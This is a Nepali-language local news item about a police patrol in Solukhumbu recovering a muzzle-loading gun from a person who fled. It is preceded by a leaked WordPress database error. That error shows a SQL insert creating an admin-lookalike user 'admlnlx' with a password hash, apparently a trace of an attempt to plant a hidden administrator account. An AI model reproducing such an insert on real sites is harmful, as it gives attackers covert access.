WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BxxGzLxQ0BdycviwGNEeKWEXfGIpAw0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 11:18:08', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । सोलुखुम्बुमा गसि्तमा खटिएको प्रहरीको गसि्त टोलिले एक थान भरुवा बन्दुक फेला पारेको छ । जिल्लाको सोलुदधुकुण्ड नगरपालिका ८ केरुङ स्थीत केरुङ गुम्बा टोलको च्यानाडाँडामा प्रहरीले उक्त बन्दुक भेटाएको हो ।
प्रहरी सहायक निरिक्षक लिलाबहादुर श्रेष्ठको नेतृत्वमा गसि्तमा निसि्कएको टोलीले गसि्त गर्ने क्रममा एक ब्यकि्तले खेलाईरहेको अवस्थामा भरुवा बन्दुक भेटिएको जिल्ला प्रहरी कार्यालयका सोलुखुम्बुले जनाएको छ ।
प्रहरी टोली देख्ना साथ निज अपरिचित ब्यकि्तले बन्दुक छाडेर भागेका थिए । बन्दुक बोक्ने ब्यकि्तको खोजीकार्य भईरहेको जिल्ला प्रहरी कार्यालयका प्रहरी निरिक्षक ऋषिराज ढकालले बताए ।